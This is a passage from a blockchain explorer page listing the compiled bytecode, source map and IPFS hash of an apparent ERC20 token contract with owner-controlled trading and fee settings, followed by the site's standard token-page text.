65b5f8060408385031215610ec0575f80fd5b50508035926020909101359150565b5f8060408385031215610ee0575f80fd5b610ee983610e13565b9150610ef760208401610e13565b90509250929050565b600181811c90821680610f1457607f821691505b602082108103610f3257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b808201808211156104b4576104b4610f38565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b818103818111156104b4576104b4610f38565b80820281158282048414176104b4576104b4610f38565b5f82610fd857634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220085a8dccc2071776e4ec5d5599596d9d42b932f5ac5328d7a98670555d9ad5a664736f6c63430008140033
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106101a1575f3560e01c806370a08231116100f3578063a9059cbb11610093578063d5aed6bf1161006e578063d5aed6bf146103ad578063dd62ed3e146103c0578063e5299e35146103f8578063f2fde38b14610401575f80fd5b8063a9059cbb14610360578063cf2b429514610373578063d5abeb0114610386575f80fd5b806391a2e723116100ce57806391a2e7231461033257806395d89b4114610345578063985bdfd1146102d4578063a457c2d71461034d575f80fd5b806370a08231146102f0578063715018a6146103185780638da5cb5b14610322575f80fd5b806327c8f8351161015e57806339509351116101395780633950935114610282578063470624021461029557806349bd5a5e146102bc5780634c255c97146102d4575f80fd5b806327c8f835146102215780632b14ca561461024c578063313ce56714610273575f80fd5b806304b4b923146101a557806306fdde03146101c1578063095ea7b3146101d6578063158ef93e146101f957806318160ddd1461020657806323b872dd1461020e575b5f80fd5b6101ae60095481565b6040519081526020015b60405180910390f35b6101c9610414565b6040516101b89190610dc8565b6101e96101e4366004610e2e565b6104a4565b60405190151581526020016101b8565b6007546101e99060ff1681565b6004546101ae565b6101e961021c366004610e56565b6104ba565b600854610234906001600160a01b031681565b6040516001600160a01b0390911681526020016101b8565b6101ae7f000000000000000000000000000000000000000000000000000000000000000081565b604051601281526020016101b8565b6101e9610290366004610e2e565b610567565b6101ae7f000000000000000000000000000000000000000000000000000000000000000081565b6007546102349061010090046001600160a01b031681565b6102dd61271081565b60405161ffff90911681526020016101b8565b6101ae6102fe366004610e8f565b6001600160a01b03165f9081526002602052604090205490565b6103206105a2565b005b5f546001600160a01b0316610234565b610320610340366004610eaf565b6105eb565b6101c9610641565b6101e961035b366004610e2e565b610650565b6101e961036e366004610e2e565b6106e8565b610320610381366004610e2e565b6106f4565b6101ae7f00000000000000000000000000000000000014bddab3e51a57cff87a5000000081565b6103206103bb366004610e8f565b61074d565b6101ae6103ce366004610ecf565b6001600160a01b039182165f90815260036020908152604080832093909416825291909152205490565b6101ae600a5481565b61032061040f366004610e8f565b6107b3565b60606005805461042390610f00565b80601f016020809104026020016040519081016040528092919081815260200182805461044f90610f00565b801561049a5780601f106104715761010080835404028352916020019161049a565b820191905f5260205f20905b81548152906001019060200180831161047d57829003601f168201915b5050505050905090565b5f6104b0338484610862565b5060015b92915050565b5f6104c6848484610985565b6001600160a01b0384165f9081526003602090815260408083203384529091529020548281101561054f5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61055c8533858403610862565b506001949350505050565b335f8181526003602090815260408083206001600160a01b038716845290915281205490916104b091859061059d908690610f4c565b610862565b5f546001600160a01b03163314806105c457506001546001600160a01b031633145b6105e05760405162461bcd60e51b815260040161054690610f5f565b6105e95f610ba0565b565b5f546001600160a01b031633148061060d57506001546001600160a01b031633145b6106295760405162461bcd60e51b815260040161054690610f5f565b600982905561063a81612328610f94565b600a555050565b60606006805461042390610f00565b335f9081526003602090815260408083206001600160a01b0386168452909152812054828110156106d15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610546565b6106de3385858403610862565b5060019392505050565b5f6104b0338484610985565b5f546001600160a01b031633148061071657506001546001600160a01b031633145b6107325760405162461bcd60e51b815260040161054690610f5f565b6001600160a01b039091165f908152600b6020526040902055565b5f546001600160a01b031633148061076f57506001546001600160a01b031633145b61078b5760405162461bcd60e51b815260040161054690610f5f565b600780546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b5f546001600160a01b03163314806107d557506001546001600160a01b031633145b6107f15760405162461bcd60e51b815260040161054690610f5f565b6001600160a01b0381166108565760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610546565b61085f81610ba0565b50565b6001600160a01b0383166108c45760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610546565b6001600160a01b0382166109255760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610546565b6001600160a01b038381165f8181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60075460ff1615156001146109dc5760405162461bcd60e51b815260206004820152601c60248201527f436f6e74726163743a207472616465206973206e6f74206f70656e21000000006044820152606401610546565b60075461010090046001600160a01b0316158015610a01575060075460ff1615156001145b15610a79575f546001600160a01b0384811691161480610a2d57505f546001600160a01b038381169116145b610a795760405162461bcd60e51b815260206004820181905260248201527f436f6e74726163743a2074726164696e67206973206e6f7420737461727465646044820152606401610546565b600754819061010090046001600160a01b031615801590610aa757505f546001600160a01b03858116911614155b8015610ac057505f546001600160a01b03848116911614155b15610b8f576007545f906001600160a01b03610100909104811690861603610aeb5750600954610b46565b6007546001600160a01b03610100909104811690851603610b46576001600160a01b0385165f908152600b602052604090205415610b4157506001600160a01b0384165f908152600b6020526040902054610b46565b50600a545b8015610b8d575f612710610b5a8386610fa7565b610b649190610fbe565b9050610b708185610f94565b600854909350610b8b9087906001600160a01b031683610bfc565b505b505b610b9a848483610bfc565b50505050565b5f8054600180546001600160a01b03199081166001600160a01b03808516918217909355918516921682178355604051909283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038316610c605760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610546565b6001600160a01b038216610cc25760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610546565b6001600160a01b0383165f9081526002602052604090205481811015610d395760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610546565b6001600160a01b038085165f90815260026020526040808220858503905591851681529081208054849290610d6f908490610f4c565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dbb91815260200190565b60405180910390a3610b9a565b5f6020808352835180828501525f5b81811015610df357858101830151858201604001528201610dd7565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610e29575f80fd5b919050565b5f8060408385031215610e3f575f80fd5b610e4883610e13565b946020939093013593505050565b5f805f60608486031215610e68575f80fd5b610e7184610e13565b9250610e7f60208501610e13565b9150604084013590509250925092565b5f60208284031215610e9f575f80fd5b610ea882610e13565b9392505050565b5f8060408385031215610ec0575f80fd5b50508035926020909101359150565b5f8060408385031215610ee0575f80fd5b610ee983610e13565b9150610ef760208401610e13565b90509250929050565b600181811c90821680610f1457607f821691505b602082108103610f3257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b808201808211156104b4576104b4610f38565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b818103818111156104b4576104b4610f38565b80820281158282048414176104b4576104b4610f38565b5f82610fd857634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220085a8dccc2071776e4ec5d5599596d9d42b932f5ac5328d7a98670555d9ad5a664736f6c63430008140033
Deployed Bytecode Sourcemap
20679:3189:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;21162:35;;;;;;;;;160:25:1;;;148:2;133:18;21162:35:0;;;;;;;;9705:100;;;:::i;:::-;;;;;;;:::i;11938:194::-;;;;;;:::i;:::-;;:::i;:::-;;;1351:14:1;;1344:22;1326:41;;1314:2;1299:18;11938:194:0;1186:187:1;20911:31:0;;;;;;;;;10825:108;10913:12;;10825:108;;12614:529;;;;;;:::i;:::-;;:::i;20997:71::-;;;;;-1:-1:-1;;;;;20997:71:0;;;;;;-1:-1:-1;;;;;1875:32:1;;;1857:51;;1845:2;1830:18;20997:71:0;1711:203:1;21119:36:0;;;;;10667:93;;;10750:2;2061:36:1;;2049:2;2034:18;10667:93:0;1919:184:1;13552:290:0;;;;;;:::i;:::-;;:::i;21077:35::-;;;;;20949:41;;;;;;;;-1:-1:-1;;;;;20949:41:0;;;20857:45;;20897:5;20857:45;;;;;2282:6:1;2270:19;;;2252:38;;2240:2;2225:18;20857:45:0;2108:188:1;10996:143:0;;;;;;:::i;:::-;-1:-1:-1;;;;;11113:18:0;11086:7;11113:18;;;:9;:18;;;;;;;10996:143;2965:103;;;:::i;:::-;;2244:87;2290:7;2317:6;-1:-1:-1;;;;;2317:6:0;2244:87;;22075:202;;;;;;:::i;:::-;;:::i;9924:104::-;;;:::i;14345:475::-;;;;;;:::i;:::-;;:::i;11352:200::-;;;;;;:::i;:::-;;:::i;22409:137::-;;;;;;:::i;:::-;;:::i;20717:77::-;;;;;22285:116;;;;;;:::i;:::-;;:::i;11615:176::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11756:18:0;;;11729:7;11756:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11615:176;21204:38;;;;;;3223:238;;;;;;:::i;:::-;;:::i;9705:100::-;9759:13;9792:5;9785:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9705:100;:::o;11938:194::-;12046:4;12063:39;984:10;12086:7;12095:6;12063:8;:39::i;:::-;-1:-1:-1;12120:4:0;11938:194;;;;;:::o;12614:529::-;12754:4;12771:36;12781:6;12789:9;12800:6;12771:9;:36::i;:::-;-1:-1:-1;;;;;12847:19:0;;12820:24;12847:19;;;:11;:19;;;;;;;;984:10;12847:33;;;;;;;;12913:26;;;;12891:116;;;;-1:-1:-1;;;12891:116:0;;3597:2:1;12891:116:0;;;3579:21:1;3636:2;3616:18;;;3609:30;3675:34;3655:18;;;3648:62;-1:-1:-1;;;3726:18:1;;;3719:38;3774:19;;12891:116:0;;;;;;;;;13043:57;13052:6;984:10;13093:6;13074:16;:25;13043:8;:57::i;:::-;-1:-1:-1;13131:4:0;;12614:529;-1:-1:-1;;;;12614:529:0:o;13552:290::-;984:10;13665:4;13754:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13754:34:0;;;;;;;;;;13665:4;;13682:130;;13732:7;;13754:47;;13791:10;;13754:47;:::i;:::-;13682:8;:130::i;2965:103::-;2478:6;;-1:-1:-1;;;;;2478:6:0;984:10;2478:22;;:56;;-1:-1:-1;2504:14:0;;-1:-1:-1;;;;;2504:14:0;984:10;2504:30;2478:56;2456:138;;;;-1:-1:-1;;;2456:138:0;;;;;;;:::i;:::-;3030:30:::1;3057:1;3030:18;:30::i;:::-;2965:103::o:0;22075:202::-;2478:6;;-1:-1:-1;;;;;2478:6:0;984:10;2478:22;;:56;;-1:-1:-1;2504:14:0;;-1:-1:-1;;;;;2504:14:0;984:10;2504:30;2478:56;2456:138;;;;-1:-1:-1;;;2456:138:0;;;;;;;:::i;:::-;22179:16:::1;:36:::0;;;22245:24:::1;22252:17:::0;22245:4:::1;:24;:::i;:::-;22226:16;:43:::0;-1:-1:-1;;22075:202:0:o;9924:104::-;9980:13;10013:7;10006:14;;;;;:::i;14345:475::-;984:10;14463:4;14507:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;14507:34:0;;;;;;;;;;14574:35;;;;14552:122;;;;-1:-1:-1;;;14552:122:0;;4762:2:1;14552:122:0;;;4744:21:1;4801:2;4781:18;;;4774:30;4840:34;4820:18;;;4813:62;-1:-1:-1;;;4891:18:1;;;4884:35;4936:19;;14552:122:0;4560:401:1;14552:122:0;14710:67;984:10;14733:7;14761:15;14742:16;:34;14710:8;:67::i;:::-;-1:-1:-1;14808:4:0;;14345:475;-1:-1:-1;;;14345:475:0:o;11352:200::-;11463:4;11480:42;984:10;11504:9;11515:6;11480:9;:42::i;22409:137::-;2478:6;;-1:-1:-1;;;;;2478:6:0;984:10;2478:22;;:56;;-1:-1:-1;2504:14:0;;-1:-1:-1;;;;;2504:14:0;984:10;2504:30;2478:56;2456:138;;;;-1:-1:-1;;;2456:138:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;22495:33:0;;::::1;;::::0;;;:23:::1;:33;::::0;;;;:43;22409:137::o;22285:116::-;2478:6;;-1:-1:-1;;;;;2478:6:0;984:10;2478:22;;:56;;-1:-1:-1;2504:14:0;;-1:-1:-1;;;;;2504:14:0;984:10;2504:30;2478:56;2456:138;;;;-1:-1:-1;;;2456:138:0;;;;;;;:::i;:::-;22363:13:::1;:30:::0;;-1:-1:-1;;;;;22363:30:0;;::::1;;;-1:-1:-1::0;;;;;;22363:30:0;;::::1;::::0;;;::::1;::::0;;22285:116::o;3223:238::-;2478:6;;-1:-1:-1;;;;;2478:6:0;984:10;2478:22;;:56;;-1:-1:-1;2504:14:0;;-1:-1:-1;;;;;2504:14:0;984:10;2504:30;2478:56;2456:138;;;;-1:-1:-1;;;2456:138:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;3326:22:0;::::1;3304:110;;;::::0;-1:-1:-1;;;3304:110:0;;5168:2:1;3304:110:0::1;::::0;::::1;5150:21:1::0;5207:2;5187:18;;;5180:30;5246:34;5226:18;;;5219:62;-1:-1:-1;;;5297:18:1;;;5290:36;5343:19;;3304:110:0::1;4966:402:1::0;3304:110:0::1;3425:28;3444:8;3425:18;:28::i;:::-;3223:238:::0;:::o;18128:380::-;-1:-1:-1;;;;;18264:19:0;;18256:68;;;;-1:-1:-1;;;18256:68:0;;5575:2:1;18256:68:0;;;5557:21:1;5614:2;5594:18;;;5587:30;5653:34;5633:18;;;5626:62;-1:-1:-1;;;5704:18:1;;;5697:34;5748:19;;18256:68:0;5373:400:1;18256:68:0;-1:-1:-1;;;;;18343:21:0;;18335:68;;;;-1:-1:-1;;;18335:68:0;;5980:2:1;18335:68:0;;;5962:21:1;6019:2;5999:18;;;5992:30;6058:34;6038:18;;;6031:62;-1:-1:-1;;;6109:18:1;;;6102:32;6151:19;;18335:68:0;5778:398:1;18335:68:0;-1:-1:-1;;;;;18416:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18468:32;;160:25:1;;;18468:32:0;;133:18:1;18468:32:0;;;;;;;18128:380;;;:::o;22554:1311::-;22707:11;;;;:19;;:11;:19;22685:97;;;;-1:-1:-1;;;22685:97:0;;6383:2:1;22685:97:0;;;6365:21:1;6422:2;6402:18;;;6395:30;6461;6441:18;;;6434:58;6509:18;;22685:97:0;6181:352:1;22685:97:0;22799:13;;;;;-1:-1:-1;;;;;22799:13:0;:27;:50;;;;-1:-1:-1;22830:11:0;;;;:19;;:11;:19;22799:50;22795:209;;;2290:7;2317:6;-1:-1:-1;;;;;22892:15:0;;;2317:6;;22892:15;;:32;;-1:-1:-1;2290:7:0;2317:6;-1:-1:-1;;;;;22911:13:0;;;2317:6;;22911:13;22892:32;22866:126;;;;-1:-1:-1;;;22866:126:0;;6740:2:1;22866:126:0;;;6722:21:1;;;6759:18;;;6752:30;6818:34;6798:18;;;6791:62;6870:18;;22866:126:0;6538:356:1;22866:126:0;23063:13;;23042:6;;23063:13;;;-1:-1:-1;;;;;23063:13:0;:27;;;;:46;;-1:-1:-1;2290:7:0;2317:6;-1:-1:-1;;;;;23094:15:0;;;2317:6;;23094:15;;23063:46;:63;;;;-1:-1:-1;2290:7:0;2317:6;-1:-1:-1;;;;;23113:13:0;;;2317:6;;23113:13;;23063:63;23059:744;;;23186:13;;23143:12;;-1:-1:-1;;;;;23186:13:0;;;;;;23178:21;;;;23174:371;;-1:-1:-1;23227:16:0;;23174:371;;;23288:13;;-1:-1:-1;;;;;23288:13:0;;;;;;23282:19;;;;23278:267;;-1:-1:-1;;;;;23326:29:0;;;;;;:23;:29;;;;;;:34;23322:208;;-1:-1:-1;;;;;;23392:29:0;;;;;;:23;:29;;;;;;23322:208;;;-1:-1:-1;23494:16:0;;23322:208;23563:8;;23559:233;;23592:22;20897:5;23617:13;23626:4;23617:6;:13;:::i;:::-;:30;;;;:::i;:::-;23592:55;-1:-1:-1;23684:23:0;23592:55;23684:6;:23;:::i;:::-;23748:11;;23666:41;;-1:-1:-1;23726:50:0;;23742:4;;-1:-1:-1;;;;;23748:11:0;23761:14;23726:15;:50::i;:::-;23573:219;23559:233;23128:675;23059:744;23815:42;23831:4;23837:2;23841:15;23815;:42::i;:::-;22674:1191;22554:1311;;;:::o;3621:227::-;3695:16;3714:6;;;3731:25;;-1:-1:-1;;;;;;3731:25:0;;;-1:-1:-1;;;;;3714:6:0;;;3731:25;;;;;;3767:17;;;;;;;;;3800:40;;3714:6;;;;3800:40;;3695:16;3800:40;3684:164;3621:227;:::o;15310:770::-;-1:-1:-1;;;;;15450:20:0;;15442:70;;;;-1:-1:-1;;;15442:70:0;;7496:2:1;15442:70:0;;;7478:21:1;7535:2;7515:18;;;7508:30;7574:34;7554:18;;;7547:62;-1:-1:-1;;;7625:18:1;;;7618:35;7670:19;;15442:70:0;7294:401:1;15442:70:0;-1:-1:-1;;;;;15531:23:0;;15523:71;;;;-1:-1:-1;;;15523:71:0;;7902:2:1;15523:71:0;;;7884:21:1;7941:2;7921:18;;;7914:30;7980:34;7960:18;;;7953:62;-1:-1:-1;;;8031:18:1;;;8024:33;8074:19;;15523:71:0;7700:399:1;15523:71:0;-1:-1:-1;;;;;15691:17:0;;15667:21;15691:17;;;:9;:17;;;;;;15741:23;;;;15719:111;;;;-1:-1:-1;;;15719:111:0;;8306:2:1;15719:111:0;;;8288:21:1;8345:2;8325:18;;;8318:30;8384:34;8364:18;;;8357:62;-1:-1:-1;;;8435:18:1;;;8428:36;8481:19;;15719:111:0;8104:402:1;15719:111:0;-1:-1:-1;;;;;15866:17:0;;;;;;;:9;:17;;;;;;15886:22;;;15866:42;;15930:20;;;;;;;;:30;;15902:6;;15866:17;15930:30;;15902:6;;15930:30;:::i;:::-;;;;;;;;15995:9;-1:-1:-1;;;;;15978:35:0;15987:6;-1:-1:-1;;;;;15978:35:0;;16006:6;15978:35;;;;160:25:1;;148:2;133:18;;14:177;15978:35:0;;;;;;;;16026:46;19108:125;196:548:1;308:4;337:2;366;355:9;348:21;398:6;392:13;441:6;436:2;425:9;421:18;414:34;466:1;476:140;490:6;487:1;484:13;476:140;;;585:14;;;581:23;;575:30;551:17;;;570:2;547:26;540:66;505:10;;476:140;;;480:3;665:1;660:2;651:6;640:9;636:22;632:31;625:42;735:2;728;724:7;719:2;711:6;707:15;703:29;692:9;688:45;684:54;676:62;;;;196:548;;;;:::o;749:173::-;817:20;;-1:-1:-1;;;;;866:31:1;;856:42;;846:70;;912:1;909;902:12;846:70;749:173;;;:::o;927:254::-;995:6;1003;1056:2;1044:9;1035:7;1031:23;1027:32;1024:52;;;1072:1;1069;1062:12;1024:52;1095:29;1114:9;1095:29;:::i;:::-;1085:39;1171:2;1156:18;;;;1143:32;;-1:-1:-1;;;927:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;2301:186::-;2360:6;2413:2;2401:9;2392:7;2388:23;2384:32;2381:52;;;2429:1;2426;2419:12;2381:52;2452:29;2471:9;2452:29;:::i;:::-;2442:39;2301:186;-1:-1:-1;;;2301:186:1:o;2492:248::-;2560:6;2568;2621:2;2609:9;2600:7;2596:23;2592:32;2589:52;;;2637:1;2634;2627:12;2589:52;-1:-1:-1;;2660:23:1;;;2730:2;2715:18;;;2702:32;;-1:-1:-1;2492:248:1:o;2745:260::-;2813:6;2821;2874:2;2862:9;2853:7;2849:23;2845:32;2842:52;;;2890:1;2887;2880:12;2842:52;2913:29;2932:9;2913:29;:::i;:::-;2903:39;;2961:38;2995:2;2984:9;2980:18;2961:38;:::i;:::-;2951:48;;2745:260;;;;;:::o;3010:380::-;3089:1;3085:12;;;;3132;;;3153:61;;3207:4;3199:6;3195:17;3185:27;;3153:61;3260:2;3252:6;3249:14;3229:18;3226:38;3223:161;;3306:10;3301:3;3297:20;3294:1;3287:31;3341:4;3338:1;3331:15;3369:4;3366:1;3359:15;3223:161;;3010:380;;;:::o;3804:127::-;3865:10;3860:3;3856:20;3853:1;3846:31;3896:4;3893:1;3886:15;3920:4;3917:1;3910:15;3936:125;4001:9;;;4022:10;;;4019:36;;;4035:18;;:::i;4066:356::-;4268:2;4250:21;;;4287:18;;;4280:30;4346:34;4341:2;4326:18;;4319:62;4413:2;4398:18;;4066:356::o;4427:128::-;4494:9;;;4515:11;;;4512:37;;;4529:18;;:::i;6899:168::-;6972:9;;;7003;;7020:15;;;7014:22;;7000:37;6990:71;;7041:18;;:::i;7072:217::-;7112:1;7138;7128:132;;7182:10;7177:3;7173:20;7170:1;7163:31;7217:4;7214:1;7207:15;7245:4;7242:1;7235:15;7128:132;-1:-1:-1;7274:9:1;;7072:217::o
Swarm Source
ipfs://085a8dccc2071776e4ec5d5599596d9d42b932f5ac5328d7a98670555d9ad5a6
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.